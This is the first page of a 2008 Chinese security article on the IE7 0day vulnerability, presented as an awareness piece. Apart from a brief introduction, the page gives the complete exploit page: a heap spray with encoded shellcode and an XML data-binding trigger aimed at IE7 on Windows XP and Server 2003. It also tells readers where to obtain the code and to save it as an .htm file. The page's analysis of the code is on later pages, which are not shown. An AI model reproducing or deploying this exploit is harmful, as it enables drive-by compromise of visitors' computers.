IT运维管理,创造商业价值!
中国IT运维网首页 | 资讯中心 | 运维管理 | 信息安全 | CIO视界 | 云计算 | 最佳案例 | 运维资源 | 专题策划 | 知识库 | 论坛

攻防实战:深入剖析最新IE7.0 0day漏洞利用代码(1)

2008年12月15日
/

这几天国内几乎所有的媒体都用大幅的版面报道了IE7.0的最新漏洞,由于微软迟迟没有推出安全补丁,并且该漏洞能影响到所有使用IE控件的程序,包括各主要浏览器、邮件客户端、办公软件、Rss订阅器以及可嵌入网页的所有第三方软件,影响范围极其广泛!笔者做了一个试验,在Google浏览器中中搜索一下“ie7.0 0day”出来2700多条记录,各大杀毒厂商纷纷推出漏洞修复工具以及预防方法,感觉比MS08067漏洞还热闹,算是岁末安全界的一件大事。

12月9 日,国内一些安全界知名人士的blog纷纷贴出了漏洞代码,不少无赖网站都纷纷挂上了恶意代码已获取利益。笔者的几个朋友未能幸免,点击恶意网站后导致机器蓝屏无法加载系统,只得郁闷的重装。为了了解恶意代码的危害,提高大家的安全意识,笔者在这里对该恶意代码进行一个简单的分析,希望能对大家有所帮助,避免不必要的损失。

获取IE7.0 最新漏洞代码

1.获取IE7.0 0day代码

获取代码的一个最好的方式就是通过Google等搜索工具搜索,推荐在本地在虚拟机中使用VPN代理到Google英文版中搜索,相对而言国外会早于国内公布0day代码。关于该漏洞代码,现在很多安全和黑客网站都已经贴出了代码,如果没有该代码的可以到http://www.antian365.com/bbs/viewthread.php?tid=2813&extra=page%3D1(呵呵,顺便帮团队做下广告)将以下代码保存为将该代码保存为IE7_0day.htm,即IE7.0 0Day。

<script language="javascript">
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");
function sleep(milliseconds)
{
var start=new Date().getTime();
for(var i=0;i<1e7;i++)
{if((new Date().getTime()-start)>milliseconds)
{break}
}
}
function spray(sc)
{
var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));
var heapBlockSize=0x100000;
var payLoadSize=infect.length*2;
var szlong=heapBlockSize-(payLoadSize+0x038);
var retVal=unescape("%u0a0a%u0a0a");
retVal=getSampleValue(retVal,szlong);
aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
zzchuck=new Array();
for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}
}
function getSampleValue(retVal,szlong)
{
while(retVal.length*2<szlong)
{retVal+=retVal}
retVal=retVal.substring(0,szlong/2);
return retVal
}
var a1="dadong";
spray(a1+"9090"+a1+"dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031C
dadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122dadong4921dadong0121
dadong2121dadong214BdadongF1DEdadong2198dadong2131dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DEdadongD7C9
dadongDEDEdadongC9DEdadong221Cdadong2121dadongD9AAdadong19C9dadong2121dadongC921dadong206Cdadong2121dadong67C9
dadong2121dadongC921dadong22FAdadong2121dadongD9AAdadong03C9dadong2121dadongC921dadong2065dadong2121dadong11C9
dadong2121dadongC921dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121dadongC921dadong2040dadong2121dadong3BC9
dadong2121dadongCA21dadong7279dadongFDAAdadong4B72dadong4961dadong3121dadong2121dadongC976dadong2390dadong2121
dadongC4C9dadong2121dadong7921dadong72E2dadongFDAAdadong4B72dadong4901dadong3121dadong2121dadongC976dadong23B8
dadong2121dadongECC9dadong2121dadong7921dadong76E2dadong1DC9dadong2125dadongAA21dadong12D9dadong68E8dadongE112
dadongE291dadongD3DDdadongAC8FdadongDE66dadongE27Edadong1F7Adadong26E7dadong1F99dadong7EA8dadong4720dadongE61F
dadong2466dadongC1DEdadongC8E2dadong25B4dadong2121dadongA07Adadong35CDdadong2120dadongAA21dadong1FF5dadong23E6
dadong4C42dadong0145dadongE61Fdadong2563dadong420Edadong0301dadongE3A2dadong1229dadong71E1dadong4971dadong2025
dadong2121dadong7273dadongC971dadong22E0dadong2121dadongF1DEdadongDDAAdadongE6AAdadongE1A2dadong1F29dadong39AB
dadongFAA5dadong2255dadongCA61dadong1FD7dadong21E7dadong1203dadong1FF3dadong71A9dadongA220dadong75CDdadongE112
dadongFA12dadongEDAAdadongD9A2dadong5C75dadong1F28dadong3DA8dadongA220dadong25E1dadongD3CAdadongEDAAdadongF8AA
dadongE2A2dadong1231dadong1FE1dadong62E6dadong200Ddadong2121dadong7021dadong7172dadong7171dadong7171dadong7671
dadongC971dadong2218dadong2121dadong38C9dadong2121dadong4521dadong2580dadong2121dadongAC21dadong4181dadongDEDE
dadongC9DEdadong2216dadong2121dadongFA12dadong7272dadong7272dadongF1DEdadong19A1dadongA1C9dadongC819dadong2E54
dadong59A0dadongB124dadongB1B1dadong55B1dadong7427dadongCDAAdadong61ACdadongDE24dadongC9C1dadongDE0FdadongDEDE
dadongC9E2dadongDE09dadongDEDEdadong3099dadong2520dadongE3A1dadong212Ddadong3AC9dadongDEDEdadong12DEdadong71E1
dadongC975dadong2175dadong2121dadongC971dadong23AAdadong2121dadongF1DEdadongA117dadong051Ddadong5621dadongC92B
dadong2360dadong2121dadongDE12dadongDE76dadongC9F1dadong20DAdadong2121dadongDE49dadong2121dadongDE21dadongC9F1
dadongDFC9dadongDEDEdadong7672dadong1277dadong71E1dadongC975dadong213Fdadong2121dadongC971dadong2374dadong2121
dadongF1DEdadongA117dadong051Ddadong5621dadongC92Bdadong232Adadong2121dadongDE12dadongDE76dadong79F1dadong7E7F
dadongE27Adadong23CAdadongE279dadongD8C9dadongDEDEdadong77DEdadongA276dadong29CDdadongDDAAdadong294Bdadong1F76
dadong56DEdadongC935dadong237Cdadong2121dadongF1DEdadongDDAAdadong4049dadong444Cdadong4921dadong6468dadong5367
dadongD5AAdadong2998dadong2121dadongD221dadong5487dadong4B0Edadong1F21dadong55DEdadong0105dadong05C9dadong2123
dadongDE21dadongAAF1dadongC9D9dadong20EAdadong2121dadongF1DEdadongD91Adadong2955dadongAA17dadong0565dadong1F01
dadong21DEdadongDE1Fdadong0555dadongC93Ddadong20CEdadong2121dadongF1DEdadongE5A2dadong7E31dadong997Fdadong2120
dadong2121dadong49E2dadong4F4Edadong2121dadong5449dadong4D53dadongCA4CdadongAC34dadong0565dadong7125dadong03C9
dadongDEDFdadong71DEdadong6BC9dadong2123dadongC821dadongDFC3dadongDEDEdadongC7C9dadongDEDEdadongA2DEdadong29E5
dadong4BE2dadong494Ddadong554Fdadong4D45dadong34CAdadong65ACdadong2505dadongC971dadongDCDAdadongDEDEdadongC971
dadong2302dadong2121dadong9AC8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong1249dadong2113
dadong4921dadong5254dadong5344dadong34CAdadong65ACdadong2505dadongC971dadongDCF0dadongDEDEdadongC971dadong20D8
dadong2121dadongB0C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong4249dadong5657dadong4921
dadong4952dadong4E45dadong34CAdadong65ACdadong2505dadongC971dadongDC86dadongDEDEdadongC971dadong20EEdadong2121
dadong46C8dadongDEDFdadongC9DEdadongDEC7dadongDEDEdadongE5A2dadongE229dadong5749dadong5946dadongCA21dadongAC34
dadong0565dadong7125dadongA3C9dadongDEDCdadong71DEdadong8BC9dadong2120dadongC821dadongDF63dadongDEDEdadongC7C9
dadongDEDEdadongA2DEdadong25E5dadongC9E2dadong208Adadong2121dadong3A49dadong67E7dadong7158dadongE7C9dadong2120
dadongA221dadong29E5dadongC9E2dadong20B6dadong2121dadongCD49dadong22B6dadong712Ddadong93C9dadong2120dadongA221
dadong29E5dadongC9E2dadong20A2dadong2121dadong8B49dadong2CDDdadong715DdadongBFC9dadong2120dadongA221dadong29E5
dadongC9E2dadong204Edadong2121dadongCC49dadongCE77dadong7117dadongABC9dadong2120dadongA221dadong29E5dadongC9E2
dadong207Adadong2121dadongD149dadong25ABdadong717Edadong57C9dadong2120dadongA221dadong29E5dadongC9E2dadongDFD6
dadongDEDEdadong5949dadongFA49dadong713Ddadong43C9dadong2120dadongA221dadong29E5dadongC9E2dadong2012dadong2121
dadongCE49dadongC1EFdadong7141dadong6FC9dadong2120dadongA221dadong29E5dadongC9E2dadong203Edadong2121dadong9149
dadong0C68dadong71FAdadong1BC9dadong2120dadongA221dadong29E5dadongC9E2dadongDE17dadongDEDEdadong8A49dadongBA7F
dadong713Fdadong07C9dadong2120dadongA221dadong29E5dadongC9E2dadongDF86dadongDEDEdadong7849dadongA0B6dadong7123
dadong33C9dadong2120dadongA221dadong29E5dadongC9E2dadong21C2dadong2121dadong5F49dadongC3F9dadong7152dadongDFC9
dadong2121dadongA221dadong29E5dadongC9E2dadong21EEdadong2121dadongBF49dadong9AD8dadong7114dadongCBC9dadong2121
dadongA221dadong29E5dadongC9E2dadongDFB3dadongDEDEdadong7649dadong9481dadong719AdadongF7C9dadong2121dadongA221
dadong29E5dadongC9E2dadongDF5FdadongDEDEdadong3B49dadong3F5Bdadong7123dadongE3C9dadong2121dadongA221dadong29E5
dadongC9E2dadongDF4BdadongDEDEdadongC149dadong117Adadong71B5dadong8FC9dadong2121dadongA221dadong29E5dadongC9E2
dadongDF77dadongDEDEdadongB649dadongC3E8dadong7182dadongBBC9dadong2121dadongA221dadong29E5dadongC9E2dadongDF63
dadongDEDEdadong4949dadongE405dadong7192dadongA7C9dadong2121dadongA221dadong29E5dadongC9E2dadong2176dadong2121
dadong5349dadong92DFdadong7137dadong53C9dadong2121dadongA221dadong29E5dadongC9E2dadongDF65dadongDEDEdadong32CA
dadong444BdadongC971dadongDAD6dadongDEDEdadongC971dadongDF8AdadongDEDEdadong96C8dadongDEDDdadongC9DE
dadongDEC9dadongDEDEdadongC9E2dadongDC88dadongDEDEdadong6E49dadong6ECEdadong7124dadong1FC9dadong2121
dadongA221dadong29E5dadongC9E2dadong212Edadong2121dadongAF49dadong2F6Fdadong71CDdadong0BC9dadong2121dadongA221
dadong29E5dadong12E2dadong45E1dadong61AAdadongA411dadong59E1dadong1F31dadong61AAdadong1F2Ddadong51AAdadong8C3D
dadongAA1Fdadong2961dadongCAE2dadong1F2Adadong61AAdadongA215dadong5DE1dadongAA1Fdadong1D61dadong41E2dadongAA17
dadong054Ddadong1705dadong64AAdadong171Ddadong75AAdadong5924dadongF422dadongAA1Fdadong396BdadongAA1Fdadong017B
dadongFC22dadong1AC2dadong1F68dadong15AAdadong22AAdadong12D4dadong12DEdadongDDE1dadongA58Ddadong55E1dadongE026
dadong2CEEdadongD922dadongD5CAdadong1A17dadong055Ddadong5409dadong1FFEdadong7BAAdadong2205dadong47FCdadongAA1F
dadong6A2DdadongAA1Fdadong3D7BdadongFC22dadongAA1FdadongAA25dadongE422dadongA817dadong0565dadong403DdadongC9E2
dadongDA47dadongDEDEdadong5549dadong5155dadong0E1Bdadong560Edadong5656dadong430Fdadong4840dadong444Adadong0F42
dadong4F42dadong450Edadong564Edadong0E4Fdadong4E4Adadong440Fdadong4459dadong2121dadong2121dadong2121dadong2121dadong2121
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121
dadong2121dadong2121dadong2121dadong2121dadong2121dadong2121dadong0021");
sleep(3000);
nav=navigator.userAgent.toLowerCase();
if(navigator.appVersion.indexOf('MSIE')!=-1)
{
version=parseFloat(navigator.appVersion.split('MSIE')[1])
}
if(version==7)
{
w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://&#114;&#2570;&#114;.book.com src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');
var i=1;while(i<=10)
{
window.status=" ";i++}
}
</script>


共6页: 1 [2] [3] [4] [5] [6] 下一页
 第 1 页:  第 2 页:对代码初步分析
 第 3 页:监控文件运行情况  第 4 页:木马下载文件
 第 5 页:分析漏洞代码  第 6 页:漏洞补丁及安全防范
发表评论请到:http://bbs.cnitom.com

相关阅读

图文热点

Power架构产品创新 IBM推动其本土化发展
Power架构产品创新 IBM推动其本土化发展自从1990年,IBM推出基于RISC系统的新产品线RS/6000(现称eServer p系列)之后,...
WAF:高校Web应用安全守护者
WAF:高校Web应用安全守护者最近几年高校网站被攻击的事件时有发生,造成了不良影响,因此越来越多的高校开始...

本类热点